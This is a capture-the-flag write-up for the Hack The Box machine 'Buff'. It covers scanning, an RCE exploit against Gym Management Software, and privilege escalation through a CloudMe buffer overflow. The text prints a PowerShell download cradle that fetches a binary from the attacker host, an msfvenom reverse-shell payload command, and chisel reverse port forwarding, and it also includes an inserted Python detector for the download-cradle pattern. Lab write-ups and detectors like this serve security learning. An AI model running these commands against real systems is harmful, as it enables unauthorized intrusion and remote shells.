. . .

Introduction

This is the second active machine that I am trying to solve.

The introduction suggests that this machine is based on a CVE. Let’s dive in and get root! BOOM BOOM!

. . .

Scanning & Enumeration

Target IP: 10.10.10.198

Nmap Command

nmap -sV -A -oA nmap/buff 10.10.10.198
Port   Protocol  Service  Version
8080   tcp       http     Apache httpd (extra info: (Win64) OpenSSL/1.1.1g PHP/7.4.6)

Service Version Enumeration

Port   Script              Result
8080   http-open-proxy     Potentially OPEN proxy. Methods supported: CONNECTION
8080   http-server-header  Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
8080   http-title          mrb3n's Bro Hut

Port Script Results

Only port 8080 (HTTP) is open. Let’s start our enumeration.

HTTP Enumeration

Landing Page

The site looks like a gym website. We keep exploring, and finally on the contact page we find:

Highlights usage of Gym Management Software

This looks like an off-the-shelf application named ‘Gym Management Software 1.0’. A quick search shows that it has an Exploit Database entry.

. . .

Vulnerability Analysis

Exploit Database Entry for Gym Management System

The entry is an unauthenticated remote code execution exploit, exactly what we would want, right!

. . .

Exploitation

Let’s download the exploit, look at the source code, and try to get RCE on the target.

Exploit Details

The script documents the vulnerability it targets. We download the exploit, run it against the target, and get our initial foothold!

. . .

Privesc

Once we have our initial foothold, let us transfer some useful binaries onto the target.

Let’s run winPEAS on the target. We can serve it by starting a simple HTTP server in the directory containing winPEAS.exe and downloading it from the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.18:8000/winPEAS.exe', 'C:\xampp\htdocs\gym\upload\winPEAS.exe')"
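From the defender’s side, the transfer command above (a PowerShell WebClient download cradle, spawned under the web server and writing an executable into the application’s upload directory) is a noisy pattern in process-creation telemetry. The following Python is an added example, not from the original writeup: it scores constructed Sysmon-style events for exactly those traits. The flattened key=value log format and the sample events are assumptions.

```python
import re

# Field extraction for the constructed "key=value" event lines below (a hypothetical
# flattened log format; real Sysmon EID 1 / Security 4688 events carry the same fields).
FIELD_RE = re.compile(r"(ParentImage|Image|CommandLine)=(.*?)(?=\s(?:ParentImage|Image|CommandLine)=|$)")

# Traits tied to the behaviour in this writeup: a web server process spawning a shell that
# pulls a binary from a remote host into the web application's upload directory.
WEBSERVER_PARENT = re.compile(r"\\(httpd|w3wp|nginx|php-cgi)\.exe$")
CRADLE = re.compile(r"(?i)System\.Net\.WebClient\)?\s*\.DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer")
WEBROOT_WRITE = re.compile(r"(?i)[A-Z]:\\(xampp\\htdocs|inetpub\\wwwroot)\\")
EXE_FETCH = re.compile(r"(?i)https?://\S+\.(exe|dll|ps1|bat)\b")

# Constructed sample events (not output from the original page); event 1 mirrors the
# winPEAS transfer command shown above.
SAMPLE_EVENTS = [
    r"ParentImage=C:\xampp\apache\bin\httpd.exe Image=C:\Windows\System32\cmd.exe "
    r"CommandLine=cmd.exe /c whoami",
    r"ParentImage=C:\xampp\apache\bin\httpd.exe "
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r'''CommandLine=powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.18:8000/winPEAS.exe', 'C:\xampp\htdocs\gym\upload\winPEAS.exe')"''',
    r"ParentImage=C:\Windows\explorer.exe "
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell -c Get-Date",
]

def parse_event(line):
    # Split one event line into its ParentImage / Image / CommandLine fields.
    return dict(FIELD_RE.findall(line))

def score_event(line):
    """Return the suspicious traits present in one process-creation event."""
    fields = parse_event(line)
    parent = fields.get("ParentImage", "").lower()
    cmd = fields.get("CommandLine", "")
    reasons = []
    if WEBSERVER_PARENT.search(parent):
        reasons.append("spawned by web server process")
    if CRADLE.search(cmd):
        reasons.append("PowerShell download cradle")
    if WEBROOT_WRITE.search(cmd):
        reasons.append("writes into web root")
    if EXE_FETCH.search(cmd):
        reasons.append("fetches an executable over HTTP")
    return reasons

def detect(events, min_hits=2):
    """Return (index, reasons) for events combining at least min_hits traits; a lone
    web-server child (e.g. a legitimate CGI helper) stays below the threshold."""
    return [(i, r) for i, r in ((i, score_event(e)) for i, e in enumerate(events)) if len(r) >= min_hits]
```

Run `detect(SAMPLE_EVENTS)` to see only the winPEAS-style event flagged, with all four traits listed.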

We know the drill: anything shown in red or highlighted in yellow is worth a look!

Local Ports

Well, 3306 is usually MySQL, but this 8888 looks a little fishy. Let’s keep going.

We see a lot of links here

CloudMe_1112.exe file found in Downloads folder

Inside the Downloads folder, we see this file.

Exploit Database entry for CloudMe

And this version of CloudMe is vulnerable as well. Hmm, so this was the service listening on 8888.

Exploit Code Snippet

Let’s generate some shellcode and fire this bitch up!

Python is not available on the target, so we cannot run the exploit there; instead we forward the CloudMe port (8888, which only listens locally on the target) back to our machine and run the exploit from there. For this we can use chisel!

https://github.com/jpillora/chisel/releases/tag/v1.7.0-rc9

The release binaries for the different platforms can be downloaded from there.

Once that is done, let’s port forward!

./chisel server -p 8080 -reverse
Port-Forwarding Successful

Thus we have forwarded the service running on the target to our local machine.

Now we can generate the shellcode and substitute it into the exploit.

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1337 -f python

One major issue is that msfvenom emits the payload in a variable called ‘buf’, so we need to rename it to ‘payload’, the variable the script expects.

I use vim for that:

:%s/buf/payload/g

Once all these steps are done, set up a netcat listener, fire up the exploit, and BOOM BOOM. We have an admin shell!

Shell with Root Privileges
. . .

Summary | TL;DR

  1. Scan ports using nmap
  2. Identify the vulnerable CMS and exploit it to get a local foothold.
  3. Find another vulnerable service called `CloudMe 1.11.2`, port forward and run the exploit.
  4. BOOOM!
. . .

Parting Thoughts

In this machine, we learned the following:

  1. The most important learning point for me was the port forwarding aspect. I have encountered SSH port forwarding before, but over TCP? That’s crazy!

Thank you for reading, please provide your feedback and share with people who are in need. :)

. . .